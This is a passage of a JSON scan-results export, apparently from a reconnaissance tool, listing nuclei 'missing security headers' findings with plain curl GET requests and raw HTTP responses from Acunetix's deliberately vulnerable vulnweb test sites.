href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 563, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "discovered_date": "2024-11-13T02:41:24.648Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /%E2%80%93 HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 1245\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>404 - File or directory not found.</h2>\r\n <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 564, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:41:24.817Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 565, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries", + "discovered_date": "2024-11-13T02:41:24.977Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 566, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea/.name", + "discovered_date": "2024-11-13T02:41:25.128Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea/.name HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4f911cd6-6"\r\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\r\nServer: nginx/1.19.0\r\n\r\nacuart", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 567, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea", + "discovered_date": "2024-11-13T02:41:25.270Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:51 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /.idea/</title></head>\r\n<body>\r\n<h1>Index of /.idea/</h1><hr><pre><a href="../">../</a>\r\n<a href="scopes/">scopes/</a> 13-Nov-2012 13:29 -\r\n<a href="acuart.iml">acuart.iml</a> 20-Apr-2012 08:22 292\r\n<a href="encodings.xml">encodings.xml</a> 20-Apr-2012 08:22 171\r\n<a href="misc.xml">misc.xml</a> 20-Apr-2012 08:22 266\r\n<a href="modules.xml">modules.xml</a> 20-Apr-2012 08:22 275\r\n<a href="vcs.xml">vcs.xml</a> 20-Apr-2012 08:22 173\r\n<a href="workspace.xml">workspace.xml</a> 20-Apr-2012 08:23 12473\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 568, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/css", + "discovered_date": "2024-11-13T02:41:25.410Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/css HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 569, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:25.561Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n <h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 570, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:25.706Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a 